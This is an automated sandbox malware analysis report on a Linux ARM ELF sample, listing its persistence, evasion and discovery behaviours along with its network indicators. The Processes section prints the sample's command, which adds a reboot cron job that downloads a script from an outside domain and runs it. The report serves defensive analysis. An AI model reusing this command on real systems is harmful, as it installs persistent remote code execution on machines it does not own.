Malware Analysis Report

2024-11-13 15:54

Sample ID 241027-db288szqgn
Target bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf
SHA256 bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62
Tags
defense_evasion discovery execution persistence privilege_escalatio
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62

Threat Level: Shows suspicious behavior

The file bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery execution persistence privilege_escalatio

File and Directory Permissions Modification

Renames itself

Unexpected DNS network traffic destination

Creates/modifies Cron job

Changes its process name

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-27 02:50

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-27 02:50

Reported

2024-10-27 02:53

Platform

debian9-armhf-20240611-en

Max time kernel

144s

Max time network

136s

Command Line

[/tmp/bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/sh N/A

Renames itself

Description Indicator Process Target
N/A N/A /tmp/bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 81.169.136.222 N/A N/A
Destination IP 178.254.22.166 N/A N/A
Destination IP 51.158.108.203 N/A N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.ObcLt0 /usr/bin/crontab N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself /bin/sh /etc/init.d/rcS /tmp/bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/mounts /tmp/bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf N/A

Processes

/tmp/bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf

[/tmp/bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf]

/bin/sh

[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

Network

Country Destination Domain Proto
DE 81.169.136.222:53 kingstonwikkerink.dyn udp
BG 31.13.248.89:14965 kingstonwikkerink.dyn tcp
DE 178.254.22.166:53 kingstonwikkerink.dyn udp
FR 51.158.108.203:53 kingstonwikkerink.dyn udp
UA 88.151.195.22:6847 kingstonwikkerink.dyn tcp

Files

/var/spool/cron/crontabs/tmp.ObcLt0

MD5 156ee72da2df4c852058bb0a4d6a1c57
SHA1 ddcde4860a652c8988f3cf45cb742ae199a5c4fa
SHA256 22d5d14166a842a855fecf8daa2962429aac0da074dff2c5fd31a157d2e3e3f6
SHA512 94c14c17c65e0a2c0f1c6cbe79d480ed336c6f79ac4562ba166da7ebf765f8703502bdc8372d5079d818035efe1d7f18c16b0ab94b6e6b155dd9fd77cce78d64